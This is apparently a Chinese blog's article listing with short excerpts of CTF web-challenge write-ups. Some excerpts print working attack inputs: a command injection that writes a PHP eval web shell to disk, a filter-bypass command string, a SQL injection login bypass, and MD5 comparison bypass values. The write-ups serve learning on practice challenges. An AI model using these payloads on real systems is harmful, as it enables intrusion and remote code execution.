自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(13)
  • 收藏
  • 关注

原创 [BJDCTF2020]EasySearch

sql注入没回显,扫描一下后台,最后用御剑扫描到了index.php.swp进去是一段源代码<?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $c...

2020-03-31 16:28:45 3731

原创 [BJDCTF 2nd]EasyAspDotNet 记录

一道windows题,赵老板还是厉害。本篇为自己本人记录不是详情题解赵老板发的文章赵老板题解赵老板文章里的一句话:打 CTF 的同学也请把眼光放远一些,不要给自己创造舒适区,多接触一些新的东西。微软的漏洞,产生的原因是每台 Exchange Server 安装完后在某个 Component 中都使用了同一把固定的 Machine Key,可以通过这个KEY篡改 ASP.NET Form...

2020-03-27 23:07:16 744

原创 [BJDCTF 2nd]文件探测

#[BJDCTF 2nd]文件探测代码审计题,刚开始我用kali的dirb扫描到admin.php 和 robots.txt两个目录进入到admin.php以为是改http头,不可取回过头来看源代码这里已经提示,抓包在响应头看到hint,有个home.php,访问进去看看观察他的url存在文件包含,读取到system 的源码重要代码如下:<?php$filt...

2020-03-27 12:08:06 1002

原创 [BJDCTF 2nd] WEB 简单题汇总

Web简单题复现[BJDCTF 2nd]fake google在这里插入图片描述经过测试,存在xss和模板注入,这题是模板注入[参考文献](https://xz.aliyun.com/t/3679)[BJDCTF 2nd]old-hack[BJDCTF 2nd]duangShell[BJDCTF 2nd]简单注入方法一:方法二:方法三:[BJDCTF 2nd]Schrödinger[BJDC...

2020-03-26 17:22:11 3121

原创 BUUCTF [BJDCTF2020]Easy MD5

随便提交抓包出题人真的恶心,把sql查询语句放在响应头里(刚开始看到题我是懵逼的) select * from 'admin' where password=md5($pass,true)百度搜了搜md5($pass,true)绕过方法输入fifdyop有一段注释代码,MD5弱类型绕过?a=QNKCDZO&b=s878926199a输入后又来强类型绕过之前写了博...

2020-03-19 16:51:11 2003

原创 CTFHUB 基础-----命令执行第一关

cat 可以用,flag不在这里,找了很久都没有,最终发现可以写一句话木马进去LINUX指令看了web,发现要转义1;echo "<?php @eval(\$_POST['cmd']);?>" > 2.php不知道为啥要转义,可能linux指令要这样…或者过滤了不能cat一大窜数字的文件,菜刀点进去看,里面有flag…...

2020-03-18 22:38:58 1239

原创 ACTF新生赛 SQL注入

源代码里有个index.txt$sql = "select username from users where (username='$username') and (pw='$passwd')";构造sql万能密码可以闭合前面的username查询,注释掉后面的passwd查询1’) or 1=1#于是就有 假 or 真 所以where 1...

2020-03-17 17:46:13 146

原创 ACTF新生赛 EASYHTTP

最近自闭了,找了ACTF新生赛的源码自己复现做了一下看到下面输出了服务器对应的信息,我们将这些信息依次填上去让我们GET,POST,注意url地址:地址换了,放burb去上传GET,POST.(传中文需进行url编码)发现换了个php代码,复制到proxy放行,重新抓包 伪造ip地址即可得到flag...

2020-03-17 11:19:54 944

原创 buuctf [GXYCTF2019]Ping Ping Ping

进去就要我们ping ip ,看看能不能命令执行 ?ip=127.0.01;ls发现可行看到有flag ,不能cat,可远观而不可亵玩呼!百度了命令执行绕过方法试了很久,个人觉得这题有buga=a.php;b=fl;c=cat;$c$b$a如果把ag.php放后面就不行…a=cat;b=fl;c=ag.php;$c$b$aflag在源代码里...

2020-03-15 17:45:28 812 2

原创 buuctf [ZJCTF 2019]NiZhuanSiWei

给了一段源码,注释如下<?php $text = $_GET["text"]; $file = $_GET["file"];$password = $_GET["password"];if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ //判断$text变量是否...

2020-03-15 16:55:35 1237

原创 buuctf [SWPU2019]Web1 记录

注册进去发现可以发广告,看到这我马上试了试有没有xss漏洞可以发现是存在的。emmmm,我用beef上传那个js代码不行。。可能是我太菜了我觉得这道题应该能用xss漏洞做出来。百度了web 发现广告栏存在sql注入…学到了,留言板也是放在数据库里的,可能是最近接触xss的缘故没想到吧…太菜了我。我找到的writeup写的太简略了,我这个菜鸡就写的详细点吧…在title进行常规sql判...

2020-03-14 16:51:25 1365

原创 关于sql弱类型语言的绕过

sql语言是弱类型语言,今天根据这个特性做了个小测试在sql语句里“="是判断的意思,并不是赋值。根据上图,**‘1test’**这是一个字符窜,而他第一个字符是1,就类似于MD5弱类型绕过所以返回true。这样我们根据这个特点来访问数据库看看可以发现我们访问数据库成功’1d’=1返回true,所以成功执行,查询所有的数据我在搜索sql弱类型语言绕过的资料的时候发现了新的方法。...

2020-03-12 18:32:36 272

原创 buuctf [GXYCTF2019]BabySQli

常规sql注入都行不通,查看源码发现一个search.php,先说说base32 和 base64 的区别,base32 只有大写字母和数字数字组成,或者后面有三个等号。base64 只有大写字母和数字,小写字母组成,后面一般是两个等号。明显,那段文字是base32加密解密后:c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZXJuYW1lID0gJyRuYW...

2020-03-05 20:28:13 6035 8

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除